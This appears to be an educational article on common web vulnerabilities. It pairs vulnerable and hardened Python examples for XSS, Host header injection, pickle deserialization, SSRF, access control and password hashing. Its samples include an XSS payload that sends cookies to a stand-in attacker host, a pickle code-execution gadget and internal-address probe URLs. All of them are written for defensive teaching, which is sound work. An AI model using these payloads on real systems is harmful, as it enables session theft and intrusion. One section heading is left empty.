When developing a website or web application, developers have to decide what features are the most important to include and, in some cases, when it’s appropriate to leave certain functions out in order to save time and resources. However, every website or web application has vulnerabilities – some are just more dangerous than others. Here are ten of the most dangerous vulnerabilities that have affected popular websites and applications over the past several years and why they’re so serious.
Cross-Site Scripting (XSS)
XSS vulnerabilities let an attacker inject script into pages your site serves, so that the script runs in other users' browsers with your site's origin and can read their session cookies, act on their behalf or rewrite the page. The two most common forms are stored XSS, where the attacker submits script through a feature that saves user input and later displays it (a comment, a review, a profile field) so that every visitor who views that content executes it; and reflected XSS, where the attacker crafts a link or form submission containing script and the server echoes that input back unescaped in its response, so the victim who follows the link executes it. Third-party widgets such as a Like button or an embedded map are not XSS holes in themselves, but any script you load from another origin runs with full access to your page, so a compromised widget has the same impact as XSS; embed only the third-party scripts you need, from origins you trust. On sites with user-generated content the essential defence is output encoding: escape every user-supplied value for the context it is inserted into (HTML body, attribute, JavaScript, URL) at the moment it is rendered, preferably with a templating engine that does so by default. Filtering input on its own is not enough, and a Content-Security-Policy header limits the damage when an injection slips through.
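The stored and reflected cases above, as an added example that is not code from the original article: a comment renderer and a search page in their vulnerable form beside the hardened form that encodes each value for its context. The payloads and the page fragments are constructed for the demonstration; the example also shows the caveat that escaping does not neutralise a javascript: URL placed in an href, which has to be validated by scheme instead.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs: what an attacker would submit through a comment
# form (stored XSS) and through a search box or query string (reflected XSS).
STORED_PAYLOAD = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
REFLECTED_PAYLOAD = '"><script>alert(document.domain)</script>'
LINK_PAYLOAD = "javascript:alert(1)"


def render_comment_unsafe(author: str, body: str) -> str:
    """Vulnerable: stored user input is concatenated straight into the page."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_search_unsafe(query: str) -> str:
    """Vulnerable: the query is reflected into an attribute and the body."""
    return f'<input name="q" value="{query}"><p>Results for {query}</p>'


def esc(value: str) -> str:
    """Escape for HTML text content or a double-quoted attribute value."""
    return html.escape(value, quote=True)


def safe_href(url: str) -> str:
    """Escaping does not defuse javascript: URLs; validate the scheme instead
    and fall back to an inert link when it is not http(s)."""
    cleaned = url.strip()
    scheme = urlsplit(cleaned).scheme.lower()
    return esc(cleaned) if scheme in ("http", "https") else "#"


def render_comment_safe(author: str, body: str, website: str) -> str:
    """Hardened: each user-controlled value is encoded for the context it lands in."""
    return (
        f'<div class="comment"><b>{esc(author)}</b>: {esc(body)} '
        f'<a href="{safe_href(website)}">site</a></div>'
    )


def render_search_safe(query: str) -> str:
    """Hardened: the reflected value cannot close the attribute or open a tag."""
    return f'<input name="q" value="{esc(query)}"><p>Results for {esc(query)}</p>'


def has_script_tag(markup: str) -> bool:
    """Crude check used only to show the difference; it is not a sanitiser."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_unsafe("mallory", STORED_PAYLOAD))
    print(render_comment_safe("mallory", STORED_PAYLOAD, LINK_PAYLOAD))
    print(render_search_unsafe(REFLECTED_PAYLOAD))
    print(render_search_safe(REFLECTED_PAYLOAD))
```

The same payload that survives intact in the unsafe renderers comes out as inert `&lt;script&gt;` text in the safe ones, and the javascript: link is replaced by `#`. Note that `esc` is only correct for HTML text and quoted attributes; a value inserted into a `<script>` block or a URL query needs the encoding for that context.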
Data Leakage
This vulnerability occurs when an application accepts information from users and later reveals it to someone it was never meant for. The leak can happen at any point in the data's life: in verbose error messages, in API responses that return more fields than the page displays, in log files and backups, or in storage that turns out to be publicly reachable. Email addresses are the most common data leaked in breach incidents, but usernames, password hashes and other sensitive records have been exposed the same way.
Host Header Injection
The Host header is sent by the client, so an attacker controls it completely. The vulnerability arises when server-side code trusts that header to build absolute URLs, most famously the link in a password-reset email: if the application generates https://<Host>/reset?token=..., an attacker who requests a reset for the victim's account while sending a forged Host header gets the victim's reset token delivered to a domain the attacker owns as soon as the victim clicks the link. The same misplaced trust enables web-cache poisoning, where a response containing the attacker's host name is cached and served to every other user, and can be used to redirect visitors or load scripts from the attacker's site. The fix is to validate the Host header (and X-Forwarded-Host, if your proxy sets it) against an allowlist of the names the site actually serves, as Django's ALLOWED_HOSTS setting does, and to build links from that configured canonical host rather than from the request. Checking for the flaw is simple: send requests with a bogus Host header and look for that value in redirects, generated links or cached responses.
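The password-reset case described above, as an added example rather than code from the article: a link builder that trusts the Host header beside one that validates the header against an allowlist and builds the link from configuration. ALLOWED_HOSTS, CANONICAL_HOST and the request header dictionaries are assumptions constructed for the example.

```python
# Constructed configuration (assumption): the names this deployment answers to
# and the one it uses when it has to write an absolute URL.
ALLOWED_HOSTS = {"accounts.example.com", "www.example.com"}
CANONICAL_HOST = "accounts.example.com"


def reset_link_unsafe(headers: dict, token: str) -> str:
    """Vulnerable: the absolute URL is built from the client-controlled Host
    header, so a forged header sends the victim's token to the attacker."""
    host = headers.get("Host", CANONICAL_HOST)
    return f"https://{host}/reset?token={token}"


def normalise_host(raw: str) -> str:
    """Lower-case and drop an explicit port ('host:443'). Bracketed IPv6
    literals are not handled because this deployment never serves them
    (assumption for the example)."""
    host = raw.strip().lower()
    return host.rsplit(":", 1)[0] if ":" in host else host


def trusted_host(headers: dict) -> str:
    """Return the validated host name, or '' when the Host header is not one
    of ours. Frameworks do this centrally (Django's ALLOWED_HOSTS); the point
    is that the comparison is against configuration, not the request."""
    host = normalise_host(headers.get("Host", ""))
    return host if host in ALLOWED_HOSTS else ""


def reset_link_safe(headers: dict, token: str) -> str:
    """Hardened: reject a forged host outright and never echo the header."""
    if not trusted_host(headers):
        raise ValueError("Host header not in ALLOWED_HOSTS")
    return f"https://{CANONICAL_HOST}/reset?token={token}"


def reset_link_goes_to(headers: dict, token: str) -> str:
    """Where the hardened path would send the token, or 'rejected'."""
    try:
        return reset_link_safe(headers, token).split("/")[2]
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    forged = {"Host": "evil.example"}
    print("unsafe:", reset_link_unsafe(forged, "tok123"))      # token leaks to evil.example
    print("safe:  ", reset_link_goes_to(forged, "tok123"))     # rejected
```

Rejecting the request (HTTP 400) rather than silently substituting the canonical host is deliberate: a request that arrives with a Host value you do not serve is either an attack or a proxy misconfiguration, and both are worth surfacing.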
Insufficient Transport Layer Protection
If a site does not serve all of its pages over HTTPS (Hypertext Transfer Protocol Secure), anyone positioned on the network path (a hostile Wi-Fi hotspot, a compromised router, an ISP) can read and modify the traffic, including usernames, passwords, session cookies and credit card numbers. The common mistakes are serving only the login page over TLS and the rest of the session in plaintext, leaving an HTTP version of the site reachable so that a man-in-the-middle can downgrade users to it, and still accepting obsolete protocol versions and cipher suites. Serve every page over HTTPS, redirect plaintext requests, send a Strict-Transport-Security header, mark session cookies Secure, and restrict the server to TLS 1.2 and 1.3 with modern cipher suites.
Insecure Deserialization (OWASP Top 10 2017, A8)
Web applications accept data in many formats: JSON, XML, and language-specific object formats such as Java serialized objects, PHP serialize() output and Python pickles. Serialization turns an in-memory object into bytes that can be stored or sent; deserialization turns those bytes back into an object. The danger is that native object formats do not just carry data: they name the classes to instantiate and, in some formats, the functions to call while rebuilding the object, so deserializing attacker-controlled bytes lets the attacker choose which code runs on the server, which is frequently full remote code execution. Never deserialize untrusted input with a native object format; use a data-only format such as JSON and validate the structure and types you receive against what you expect. Where a native format is unavoidable, restrict the classes that may be loaded and integrity-protect the payload with a MAC so that only your own code can produce one. For example, Microsoft has released Security Advisory (959263) to address deserialization attacks of this kind.
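The mechanism and both mitigations described above, as an added example that is not part of the article: a constructed pickle payload whose `__reduce__` makes `pickle.loads` call a function of the attacker's choosing (the harmless `os.getcwd` stands in for `os.system`), a restricted unpickler that refuses every global, and the preferred fix of JSON plus explicit validation of the expected shape. The order record format is an assumption made for the example.

```python
import io
import json
import os
import pickle


class Exploit:
    """Constructed attacker payload. pickle lets an object dictate how it is
    rebuilt: __reduce__ returns (callable, args) and pickle.loads calls it.
    os.getcwd is a harmless stand-in for os.system or subprocess.Popen; the
    mechanism is identical, only the callable named in the bytes differs."""

    def __reduce__(self):
        return (os.getcwd, ())


def make_malicious_pickle() -> bytes:
    return pickle.dumps(Exploit())


def load_unsafe(blob: bytes):
    """Vulnerable: whatever callable the bytes name is executed here."""
    return pickle.loads(blob)


def unsafe_load_ran_attacker_code() -> bool:
    # The Exploit class is not even referenced in the pickle; only os.getcwd is,
    # so the receiving side needs no knowledge of the attacker's code.
    return load_unsafe(make_malicious_pickle()) == os.getcwd()


class RestrictedUnpickler(pickle.Unpickler):
    """Mitigation when a pickle must be read: refuse to import any global, so
    only plain data (dicts, lists, strings, numbers) can be reconstructed."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def restricted_blocks_exploit() -> bool:
    try:
        load_restricted(make_malicious_pickle())
    except pickle.UnpicklingError:
        return True
    return False


def restricted_loads_plain_data() -> bool:
    sample = {"order_id": 7, "items": ["ABC-1", "ABC-2"]}
    return load_restricted(pickle.dumps(sample)) == sample


# Preferred fix: a data-only format plus validation of exactly the shape
# the application expects (field set and types are an assumption).
ORDER_FIELDS = {"order_id": int, "sku": str, "quantity": int}


def load_order_safe(blob: bytes) -> dict:
    try:
        data = json.loads(blob)
    except ValueError as exc:
        raise ValueError("not valid JSON") from exc
    if not isinstance(data, dict) or set(data) != set(ORDER_FIELDS):
        raise ValueError("unexpected or missing fields")
    for key, typ in ORDER_FIELDS.items():
        if type(data[key]) is not typ:  # type(), not isinstance: bool subclasses int
            raise ValueError(f"{key} must be {typ.__name__}")
    if data["quantity"] <= 0 or len(data["sku"]) > 32:
        raise ValueError("field out of range")
    return data


def is_valid_order(blob: bytes) -> bool:
    try:
        load_order_safe(blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("pickle.loads ran os.getcwd:", unsafe_load_ran_attacker_code())
    print("restricted unpickler blocked it:", restricted_blocks_exploit())
    print("valid order accepted:", is_valid_order(b'{"order_id": 7, "sku": "ABC-1", "quantity": 2}'))
```

The restricted unpickler is a fallback for legacy data, not a substitute for the JSON path: it still parses an attacker-controlled byte stream with a complex decoder, whereas the JSON route rejects anything that is not exactly the record the code expects.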
Security Misconfiguration
Security misconfiguration is among the most common and most dangerous website vulnerabilities. A misconfigured site can expose sensitive data to anyone who knows where to look. Misconfigurations arise when an organisation fails to adjust settings according to best practice, or never sets them at all and runs on the defaults. Typical examples are directory listings left enabled, debug modes and stack traces shown in production, default administrative accounts and passwords, unnecessary services and sample applications left installed, and verbose server banners. Many web servers ship with defaults that expose such information even when the deployment was never intended for public use, so every deployment should start from a hardened baseline and be re-checked after each change.
Sensitive Data Exposure Through Caching
Server Side Request Forgery (SSRF)
SSRF occurs when an application fetches a resource from a URL the user supplies (a webhook, an image import, a "preview this link" feature) without checking where that URL points. Because the request is made by the server, it originates inside the network perimeter: the attacker can reach internal hosts, administrative interfaces bound to localhost, and cloud instance-metadata endpoints such as 169.254.169.254, none of which are reachable from outside. Internal services often trust any request that arrives from the application server, so SSRF turns that trust against them. The defences are to allow only http and https, to resolve the host name and reject loopback, link-local and private address ranges (checking the resolved address, not just the name, because of DNS rebinding), to disable redirects or re-check every hop, and wherever possible to use an allowlist of permitted destinations.
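The URL vetting described above, as an added example that is not code from the article: scheme allowlisting, rejection of embedded credentials, and a check of every address the host resolves to against the loopback, link-local, private and multicast ranges (including IPv4-mapped IPv6 addresses). The resolver is injectable so the example runs offline against constructed DNS answers; the host names and addresses in FAKE_DNS are placeholders, not real services.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(hostname: str) -> list:
    """Production resolver: every address the name maps to (A and AAAA)."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})
    except socket.gaierror:
        return []


def is_public_address(ip_text: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is loopback in disguise
    return ip.is_global and not ip.is_multicast


def vet_outbound_url(url: str, resolver=resolve_all) -> list:
    """Return the vetted IP addresses for url, or raise ValueError.
    The caller should connect to one of the returned addresses (sending the
    original Host header) instead of re-resolving the name; otherwise a DNS
    rebinding attacker can change the answer between this check and the
    connection. Redirects must be vetted again with the same function."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {scheme!r} not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("URL has no host")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in URL not allowed")
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP, no DNS needed
    except ValueError:
        addresses = resolver(host)
    if not addresses:
        raise ValueError(f"{host!r} does not resolve")
    bad = [a for a in addresses if not is_public_address(a)]
    if bad:
        raise ValueError(f"{host!r} resolves to non-public address {bad[0]}")
    return addresses


def is_safe_outbound_url(url: str, resolver=resolve_all) -> bool:
    try:
        vet_outbound_url(url, resolver)
        return True
    except ValueError:
        return False


# Constructed DNS answers so the example runs offline; the public addresses
# are placeholders chosen only because they fall outside every special range.
FAKE_DNS = {
    "api.partner.example": ["93.184.216.34"],
    "rebind.attacker.example": ["93.184.216.35", "10.0.0.5"],  # one public, one internal
    "localhost": ["127.0.0.1", "::1"],
    "metadata.internal": ["169.254.169.254"],
}


def fake_resolver(hostname: str) -> list:
    return FAKE_DNS.get(hostname.lower(), [])


if __name__ == "__main__":
    for candidate in ["https://api.partner.example/v1/hook",
                      "http://rebind.attacker.example/",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://[::ffff:127.0.0.1]/",
                      "file:///etc/passwd"]:
        print(f"{candidate:45} -> {is_safe_outbound_url(candidate, fake_resolver)}")
```

A name that resolves to both a public and an internal address is rejected outright: accepting it because one answer looked fine is exactly the gap a rebinding attacker uses. For the cloud-metadata case, the address check is a backstop; the primary control is requiring the metadata service's own protections (for example a session-token header) and a network egress policy that does not let the application server reach it at all.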
Improper Access Control (OWASP Top 10 2021, A01 Broken Access Control)
Improper access control occurs when data or functions are exposed without a proper authorization check. Authentication establishes who the user is; access control decides what that user is allowed to do, and it has to be enforced on the server on every request. Typical failures are insecure direct object references, where changing an identifier in a URL (/orders/1042 to /orders/1043) returns another user's record because the handler only checks that the caller is logged in, not that the object belongs to them; administrative functions that are merely hidden from the navigation rather than protected; and privilege escalation through request parameters such as role=admin that the server writes without question. The result is a system that does not properly check who is doing what, so an attacker with an ordinary account, or no account at all, reads or changes data they were never authorised for. Broken authentication and session management (guessable credentials, weak session tokens, sessions that never expire) is a related but separate failure that lets the attacker become someone else in the first place.
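The two failures named above, as an added example that is not code from the article: an order lookup with an insecure direct object reference beside one that authorizes against the object's owner, and a profile update open to mass assignment beside one restricted to an allowlist of fields. The in-memory ORDERS and USERS tables, the roles and the "support can view any order" rule are constructed assumptions for the example.

```python
# Constructed sample data standing in for a database (assumption).
ORDERS = {
    1042: {"owner": "alice", "total": 120.00},
    1043: {"owner": "bob", "total": 88.50},
}
USERS = {
    "alice": {"email": "alice@example.org", "role": "customer"},
    "bob": {"email": "bob@example.org", "role": "customer"},
    "carol": {"email": "carol@example.org", "role": "support"},
}


class Forbidden(Exception):
    pass


class NotFound(Exception):
    pass


def get_order_unsafe(session_user, order_id: int) -> dict:
    """Vulnerable (insecure direct object reference): the handler checks that
    *someone* is logged in, then returns whatever ID the client asked for."""
    if session_user is None:
        raise Forbidden("login required")
    return ORDERS[order_id]


def can_view_order(user: str, order: dict) -> bool:
    """The authorization rule, kept in one place so every handler applies
    the same one (assumed rule: owners and support staff may view)."""
    return order["owner"] == user or USERS[user]["role"] == "support"


def get_order_safe(session_user, order_id: int) -> dict:
    """Hardened: authenticate, then authorize against the object itself."""
    if session_user is None:
        raise Forbidden("login required")
    order = ORDERS.get(order_id)
    if order is None or not can_view_order(session_user, order):
        # Same answer for 'missing' and 'not yours' so IDs cannot be enumerated.
        raise NotFound(order_id)
    return order


def update_profile_unsafe(session_user: str, payload: dict) -> dict:
    """Vulnerable (mass assignment): every submitted field is written, so a
    client that adds "role": "admin" to the form promotes itself."""
    USERS[session_user].update(payload)
    return dict(USERS[session_user])


EDITABLE_FIELDS = {"email"}


def update_profile_safe(session_user: str, payload: dict) -> dict:
    """Hardened: only an allowlist of fields may be set by the user."""
    rejected = set(payload) - EDITABLE_FIELDS
    if rejected:
        raise Forbidden(f"fields not editable: {sorted(rejected)}")
    USERS[session_user].update({k: payload[k] for k in EDITABLE_FIELDS if k in payload})
    return dict(USERS[session_user])


def outcome(handler, session_user, arg) -> str:
    """Map a handler's result to the HTTP status it would produce."""
    try:
        handler(session_user, arg)
        return "200"
    except Forbidden:
        return "403"
    except (NotFound, KeyError):
        return "404"


if __name__ == "__main__":
    print("bob reads alice's order, unsafe:", outcome(get_order_unsafe, "bob", 1042))  # 200
    print("bob reads alice's order, safe:  ", outcome(get_order_safe, "bob", 1042))    # 404
    print("bob promotes himself, unsafe:", update_profile_unsafe("bob", {"role": "admin"})["role"])
    print("alice tries the same, safe:  ", outcome(update_profile_safe, "alice", {"role": "admin"}))
```

The important design point is that `can_view_order` takes the object, not just the ID: the check is about the relationship between the caller and the record, and it belongs in one function that every handler reuses rather than in scattered ad hoc conditions.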
Insufficient Cryptography (OWASP Top 10 2021, A02 Cryptographic Failures)
Insufficient cryptography refers to using weak or broken algorithms, home-made constructions, or a sound algorithm in the wrong way (hard-coded keys, reused IVs, ECB mode, no integrity protection, MD5 or unsalted SHA-1 for password storage), leaving data exposed even though it is nominally "encrypted". Protect data in transit with TLS 1.2 or 1.3 and a modern cipher suite such as AES-256-GCM; protect data at rest with an authenticated encryption mode and keys kept out of the code base; and store passwords only as salted, deliberately slow hashes (Argon2, scrypt or bcrypt), never with a fast general-purpose hash or a reversible cipher. Compare secrets with a constant-time comparison so that timing does not leak how much of a guess was correct.
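The password-storage half of the advice above, as an added example that is not code from the article: an unsalted MD5 store beside a salted scrypt store whose parameters travel with the hash, verified with a constant-time comparison. It uses only the Python standard library (`hashlib.scrypt` needs an OpenSSL-backed build); the work factors are an assumption to be tuned per deployment.

```python
import hashlib
import hmac
import os

# Work factor (assumption): N=2**14 with r=8 costs 16 MiB of memory per guess,
# which is what makes GPU and ASIC cracking expensive. Raise N on capable hardware.
SCRYPT_N, SCRYPT_R, SCRYPT_P, KEY_LEN = 2 ** 14, 8, 1, 32


def store_password_weak(password: str) -> str:
    """Insufficient: a fast, unsalted hash. Identical passwords give identical
    hashes (so one crack or one leaked table breaks every matching account),
    and a single GPU tries billions of MD5 guesses per second."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def store_password(password: str) -> str:
    """Salted, memory-hard hash. The parameters are stored alongside the
    digest so they can be raised later without invalidating old records."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_LEN)
    return "$".join(["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
                     salt.hex(), digest.hex()])


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, n, r, p, salt_hex, digest_hex = stored.split("$")
        expected = bytes.fromhex(digest_hex)
        salt = bytes.fromhex(salt_hex)
    except ValueError:
        return False  # malformed record, never "accept"
    if algo != "scrypt":
        return False
    candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                               n=int(n), r=int(r), p=int(p), dklen=len(expected))
    # Constant-time comparison: an early-exit == would leak how many leading
    # bytes of the guess matched.
    return hmac.compare_digest(candidate, expected)


def weak_hashes_are_linkable(password: str) -> bool:
    """Two users with the same password get the same MD5 record."""
    return store_password_weak(password) == store_password_weak(password)


def strong_hashes_are_unlinkable(password: str) -> bool:
    """The per-record salt makes the same password hash differently each time."""
    return store_password(password) != store_password(password)


if __name__ == "__main__":
    record = store_password("correct horse battery staple")
    print(record)
    print("verify right password:", verify_password("correct horse battery staple", record))
    print("verify wrong password:", verify_password("Tr0ub4dor&3", record))
    print("md5 records linkable:", weak_hashes_are_linkable("hunter2"))
```

The record format (`scrypt$N$r$p$salt$digest`) is the same idea as the `$2b$` prefix in bcrypt strings or the `$argon2id$` header in Argon2: a verifier can tell how a hash was made and can upgrade it on the user's next successful login. Encrypting passwords with AES instead is a mistake, because whoever holds the key can decrypt the whole table.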